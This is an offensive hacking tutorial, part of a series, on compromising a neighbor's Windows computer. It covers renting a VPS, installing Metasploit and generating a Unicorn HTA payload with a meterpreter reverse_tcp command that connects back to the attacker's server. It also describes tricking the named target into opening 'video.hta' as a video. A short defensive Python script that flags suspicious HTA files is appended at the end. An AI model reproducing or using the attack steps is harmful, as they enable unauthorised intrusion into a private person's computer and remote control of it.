In the previous article in this short series, we learned how to find our neighbor's name using publicly accessible information and how to monitor device activity on their home network. With this information at our disposal, it's time to get into installing and configuring the necessary tools to begin our attack on John Smith's computer.

First, we'll have to purchase a Virtual Private Server (VPS) in the cloud, which we'll need to host our payload so that it can be downloaded from any computer in the world. In this case, we're going to take advantage of HTML Applications (HTA), a lesser-known file type, and we'll use that to trick our target into opening a malicious HTA file on their computer. Last, we'll install Metasploit, which will be used to interface with and control the compromised machine after our malicious HTA file is opened on John's computer.

Previously: How to Hack Your Neighbor with a Post-It Note, Part 1 (Performing Recon)

Step 1: Set Up the VPS

To secure a place for our payload on the web and to run the Metasploit session, we'll need a VPS. There are many VPS providers that will work adequately for this hack. Some noteworthy ones you can check out include OVH, VPSdime, VPS.net, and Vultr. As an example, I'll be using DigitalOcean, but if you're more comfortable with another VPS provider, feel free to set up a Debian or Ubuntu VPS using your preferred provider and skip to Step 2.

As for DigitalOcean, I recommend the $10/month plan, as the cheaper option doesn't meet the hardware requirements to run Metasploit. I encountered "cannot allocate memory" errors when using DigitalOcean's cheapest $5/month option.

To create a DigitalOcean account, visit their signup page. Enter your email address and create a password. You'll then be asked to enter billing information and create a "Droplet," which is what DigitalOcean calls cloud servers.

To connect to your new DigitalOcean server, enter the below ssh command into a terminal.

If all went well, you should now have remote access to your first DigitalOcean server, where we'll host our payload and install Metasploit in later steps. If you experienced issues setting up your DigitalOcean account or Droplet, reference the DigitalOcean Droplet page or contact DigitalOcean for assistance. If you used a different VPS service, of course, consult their documentation for help.

There will likely be an Nginx service running on your new Droplet. These Nginx servers are preconfigured by DigitalOcean. This may conflict with later steps in this tutorial, so be sure to stop the running Nginx service. If you used a different VPS, you won't have to worry about this (hopefully).

sudo systemctl stop nginx

Step 2: Create the HTA Payload

Based on the MAC addresses connecting to My-Neighbor's wireless network, it's reasonable to assume there are a number of internet-connected Windows devices on the target network. To create our payload, we'll use the Unicorn GitHub repository, which contains features that will allow us to generate HTML Application payloads.

HTA is a lesser-known file type and HTML executable file format. There's a good chance non-tech-savvy users have never heard of the HTA file format. This means it would be easy to convince a victim into believing it's a video or photo format.

For this tutorial, we'll trick our victim, John Smith, into clicking on our video.hta file by telling him it's a video file. When opened, the HTA file will create a reverse shell on John's computer and allow us to remotely access the compromised device.

I'll be installing and using Unicorn from our newly created DigitalOcean server running Debian 9 (or whatever VPS you chose). Unicorn is a Python script, so there are no dependencies, and it will work on any operating system where Python is installed.

Before we begin, make sure git is installed on our new DigitalOcean (or other) server. We'll need that installed to clone the Unicorn repository. While we're at it, make sure python and python3 are installed as well. You can install them all at once by typing the apt-get command below into your terminal.

Next, clone the Unicorn repository by typing the below command. Then, change into the unicorn directory using the cd command.

Now, to generate our HTA payload, we'll use the below command.

python unicorn.py windows/meterpreter/reverse_tcp Your-Server-IP-Address 55555 hta

The windows/meterpreter/reverse_tcp part instructs Unicorn to build a payload that, when the HTA is opened, makes a TCP connection from our victim's machine back to our server.
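As an added defensive example (not part of the original tutorial or of the Unicorn project), the following Python inspector flags HTA lures of the kind described above: an .hta file named like a media file, carrying script, or configured to open with its window hidden. The file names and contents it scans are constructed samples; the window-hiding attributes it checks (windowstate, showintaskbar) are standard HTA application attributes.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Media extensions a lure name might borrow ("holiday.mp4.hta"); the tutorial's
# lure is plain "video.hta", which the script check catches instead.
MEDIA_EXTENSIONS = (".mp4", ".avi", ".mov", ".mkv", ".jpg", ".jpeg", ".png", ".gif")

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.I)
LANG_ATTR = re.compile(r"(?:language|type)\s*=\s*['\"]?([\w/-]+)", re.I)
HTA_TAG = re.compile(r"<hta:application\b([^>]*)>", re.I)
# Standard HTA attributes that keep the application window out of sight
HIDDEN_ATTRS = (re.compile(r"windowstate\s*=\s*['\"]?minimize", re.I),
                re.compile(r"showintaskbar\s*=\s*['\"]?no", re.I))

@dataclass
class HtaReport:
    path: str
    is_hta: bool
    media_lure: Optional[str]                 # e.g. ".mp4" for "holiday.mp4.hta"
    script_languages: List[str] = field(default_factory=list)
    hidden_window: bool = False

    @property
    def suspicious(self) -> bool:
        # Any .hta carrying script is the case the tutorial produces; a media-like
        # name or a hidden window only adds confidence.
        return self.is_hta and (bool(self.script_languages)
                                or self.media_lure is not None or self.hidden_window)

def inspect_hta(path: str, content: str) -> HtaReport:
    name = path.rsplit("/", 1)[-1].lower()
    report = HtaReport(path=path, is_hta=name.endswith(".hta"), media_lure=None)
    if not report.is_hta:
        return report
    stem = name[:-len(".hta")]
    report.media_lure = next((ext for ext in MEDIA_EXTENSIONS if stem.endswith(ext)), None)
    langs = set()
    for tag in SCRIPT_TAG.finditer(content):
        attr = LANG_ATTR.search(tag.group(1))
        langs.add(attr.group(1).lower() if attr else "unspecified")
    report.script_languages = sorted(langs)
    hta_tag = HTA_TAG.search(content)
    if hta_tag:
        report.hidden_window = all(p.search(hta_tag.group(1)) for p in HIDDEN_ATTRS)
    return report

# Constructed sample files (hypothetical, not produced by any tool)
SAMPLES = {
    "video.hta": '<html><head><hta:application id="x" windowstate="minimize" '
                 'showintaskbar="no"></head><body><script language="VBScript">'
                 'MsgBox "hi"</script></body></html>',
    "holiday.mp4.hta": '<html><body><script type="text/javascript">alert(1)</script></body></html>',
    "notes.html": '<html><body><script language="JScript">x=1</script></body></html>',
}

def scan_samples() -> Dict[str, HtaReport]:
    return {path: inspect_hta(path, body) for path, body in SAMPLES.items()}
```

Run scan_samples() over a mail gateway's quarantined attachments or a share listing to surface .hta files that deserve a closer look; the mshta.exe process that opens them is the corresponding endpoint-side signal.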